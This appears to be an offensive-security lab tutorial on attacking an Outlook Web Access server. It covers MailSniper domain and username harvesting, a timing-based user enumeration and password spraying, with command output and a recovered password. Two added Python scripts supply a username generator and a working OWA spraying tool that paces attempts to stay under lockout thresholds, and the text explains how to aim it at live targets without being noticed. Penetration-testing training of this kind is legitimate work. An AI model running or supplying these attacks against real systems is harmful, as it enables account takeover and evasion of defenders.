Attacking OWA

We're going to assume that we identified the OWA/Exchange service at 10.10.15.100 during our external recon.

Password Spraying:

Password spraying is an effective technique for discovering the weak passwords that users are notorious for choosing. Patterns such as MonthYear (August2019), SeasonYear (Summer2019) and DayDate (Tuesday6) are very common. Because one password is tried against many accounts rather than many passwords against one account, spraying stays under the account lockout threshold, provided you pace the rounds to the domain's lockout policy (threshold and observation window).

Two excellent tools for password spraying against Office 365 and Exchange are MailSniper and SprayingToolkit

MailSniper
PS C:\> ipmo C:\Tools\MailSniper\MailSniper.ps1

Enumerate the NetBIOS name of the target domain with Invoke-DomainHarvestOWA.

PS C:\> Invoke-DomainHarvestOWA -ExchHostname 10.10.15.100
[*] Harvesting domain name from the server at 10.10.15.100
The domain appears to be: CYBER or cyberbotic.io

Next, we need to turn the list of names we enumerated into candidate usernames and find out which of them are valid.

root@kali:~# cat names.txt
Bob Farmer
Isabel Yates
Joyce Adams

Using namemash.py:

root@kali:~# /opt/namemash.py names.txt >> possible-usernames.txt
root@kali:~# head -n 4 possible-usernames.txt
bobfarmer
farmerbob
bob.farmer
farmer.bob
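A username generator in the style of namemash.py, as an added example (this is not the namemash.py script run above). The order of the naming forms and the handling of apostrophes, hyphens and middle names are my own assumptions; the sample names are constructed to mirror names.txt:

```python
"""Generate candidate AD/Exchange usernames from 'First Last' names so they
can be fed to Invoke-UsernameHarvestOWA. Added example, not namemash.py."""
import re
from typing import Iterable, List


def candidates(full_name: str) -> List[str]:
    """Return the common username conventions for one name, lowercased.
    Non-letters are stripped (O'Brien -> obrien, Anne-Marie -> annemarie)
    and middle names are ignored. Mononyms yield nothing usable."""
    parts = [re.sub(r"[^a-z]", "", p) for p in full_name.lower().split()]
    parts = [p for p in parts if p]
    if len(parts) < 2:
        return []
    first, last = parts[0], parts[-1]
    fi, li = first[0], last[0]
    forms = [
        first + last,          # bobfarmer
        last + first,          # farmerbob
        f"{first}.{last}",     # bob.farmer
        f"{last}.{first}",     # farmer.bob
        last + fi,             # farmerb
        fi + last,             # bfarmer   (the convention this domain uses)
        f"{fi}.{last}",        # b.farmer
        f"{li}.{first}",       # f.bob
        first,                 # bob
        last,                  # farmer
    ]
    seen = set()
    return [u for u in forms if not (u in seen or seen.add(u))]


def mash(names: Iterable[str]) -> List[str]:
    """Candidates for every name, de-duplicated across the whole list so a
    shared surname does not produce the same entry twice."""
    out: List[str] = []
    seen = set()
    for name in names:
        for u in candidates(name):
            if u not in seen:
                seen.add(u)
                out.append(u)
    return out


# Constructed sample input mirroring names.txt above.
SAMPLE_NAMES = ["Bob Farmer", "Isabel Yates", "Joyce Adams"]

if __name__ == "__main__":
    print("\n".join(mash(SAMPLE_NAMES)))
```

Write the output to possible-usernames.txt and use it as the -UserList for the harvesting step; once one valid account reveals the convention (here fi + last), trim the list to that single form before spraying to keep the attempt count down.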

Invoke-UsernameHarvestOWA uses a timing attack to validate which (if any) of these usernames are valid: OWA answers a logon attempt for an existing account measurably differently from one for a non-existent account, so the response times are compared against a baseline.

PS C:\> Invoke-UsernameHarvestOWA -ExchHostname 10.10.15.100 -Domain CYBER -UserList .\possible-usernames.txt -OutFile valid.txt

This output shows one valid result for CYBER\iyates.

You can run this again and target -Domain DEV, which will also find valid results for:

• DEV\bfarmer

• DEV\jking

• DEV\jadams

This requires a little bit of explaining. cyberbotic.io is the root of the Active Directory forest, whose NetBIOS name is CYBER.

But cyberbotic.io has a child domain called dev.cyberbotic.io, whose NetBIOS name is DEV. From this, we can ascertain that iyates is a user in the parent domain, whilst bfarmer, jking and jadams exist in the child domain.

However, short of guessing at domain names, we have no reliable way of knowing that DEV ever existed. You may be able to find clues in your OSINT, such as leaked internal domain names.

MailSniper can spray passwords against the valid account(s) identified, using Outlook Web Access (OWA), Exchange Web Services (EWS) or Exchange ActiveSync (EAS).

PS C:\> Invoke-PasswordSprayOWA -ExchHostname 10.10.15.100 -UserList .\valid.txt -Password Summer2021
[*] Now spraying the OWA portal at https://10.10.15.100/owa/

[*] SUCCESS! User:CYBER\iyates Password:Summer2021
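A lockout-aware spray loop against OWA forms authentication, as an added example (this is not MailSniper's code). It tries one password against every account per round and pauses for the full observation window once (threshold - 1) rounds have run back to back, so no account's bad-password counter reaches the lockout threshold. owa_login() assumes the standard OWA logon form at /owa/auth.aspx with forms-based authentication enabled; the scheduler itself is exercised with a constructed in-memory authenticator and the four accounts from the page so it runs offline. The lockout values in demo() are assumed, not taken from the target:

```python
"""Lockout-aware password spray for OWA. Added example, not MailSniper."""
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Tuple

Authenticator = Callable[[str, str], bool]  # (user, password) -> success


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib following 302s; the Location header is our signal."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def owa_login(base_url: str, user: str, password: str, timeout: float = 10.0) -> bool:
    """Submit the OWA logon form once. On a bad password OWA redirects back to
    logon.aspx with a 'reason=' parameter; on success it redirects to the
    destination and sets the session cookies. Assumes forms auth on /owa."""
    form = urllib.parse.urlencode({
        "destination": f"{base_url}/owa/",
        "flags": "4",
        "forcedownlevel": "0",
        "username": user,            # DOMAIN\user, as in the output above
        "password": password,
        "isUtf8": "1",
    }).encode()
    req = urllib.request.Request(f"{base_url}/owa/auth.aspx", data=form, method="POST")
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=timeout) as resp:
            location = resp.headers.get("Location", "")
    except urllib.error.HTTPError as err:  # the 302 surfaces here with _NoRedirect
        location = err.headers.get("Location", "")
    return bool(location) and "reason=" not in location


def spray(users: List[str], passwords: List[str], auth: Authenticator,
          lockout_threshold: int, observation_window_s: float,
          sleep: Callable[[float], None] = time.sleep) -> Tuple[Dict[str, str], int]:
    """One password per round across all users. After (threshold - 1) rounds
    without a pause, sleep a full observation window so badPwdCount resets.
    Returns (found_credentials, rounds_run)."""
    if lockout_threshold == 0:                 # AD: 0 means accounts never lock out
        safe_rounds = max(1, len(passwords))
    elif lockout_threshold < 2:
        raise ValueError("threshold of 1 leaves no safe attempt; do not spray")
    else:
        safe_rounds = lockout_threshold - 1    # keep one attempt of slack per account
    found: Dict[str, str] = {}
    untested = list(users)
    rounds_since_pause = 0
    rounds = 0
    for pw in passwords:
        if not untested:
            break                              # every account already cracked
        if rounds_since_pause >= safe_rounds:
            sleep(observation_window_s)        # let the bad-password counters reset
            rounds_since_pause = 0
        for user in list(untested):
            if auth(user, pw):
                found[user] = pw
                untested.remove(user)          # never hit a cracked account again
        rounds_since_pause += 1
        rounds += 1
    return found, rounds


def make_fake_auth(valid: Dict[str, str]) -> Authenticator:
    """Constructed stand-in for owa_login so the scheduler runs offline."""
    return lambda user, pw: valid.get(user) == pw


def demo() -> Tuple[Dict[str, str], int, List[float]]:
    """Constructed scenario: the four validated accounts, an assumed lockout
    threshold of 3 and a 30-minute observation window; pauses are recorded
    instead of slept."""
    users = ["CYBER\\iyates", "DEV\\bfarmer", "DEV\\jking", "DEV\\jadams"]
    passwords = ["Winter2020", "Spring2021", "Summer2021"]
    auth = make_fake_auth({"CYBER\\iyates": "Summer2021"})
    pauses: List[float] = []
    found, rounds = spray(users, passwords, auth, lockout_threshold=3,
                          observation_window_s=1800, sleep=pauses.append)
    return found, rounds, pauses


if __name__ == "__main__":
    creds, n, pauses = demo()
    print(f"{n} rounds, {len(pauses)} pause(s), found: {creds}")
```

Against a live target, pass `lambda u, p: owa_login("https://10.10.15.100", u, p)` as the authenticator and take the threshold and window from the domain's password policy (or, if it is unknown, assume a conservative value such as 3 attempts per 30 minutes). The pause logic is the part worth keeping: MailSniper offers the same pacing via its -Delay option, but whatever tool you use, locking out a list of users is the quickest way to get a spray noticed.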


With valid credentials, MailSniper can take further actions, such as downloading the Global Address List, which gives us the full set of mailbox-enabled users (across both domains) to spray next.

PS C:\> Get-GlobalAddressList -ExchHostname 10.10.15.100 -UserName CYBER\iyates -Password Summer2021 -OutFile gal.txt
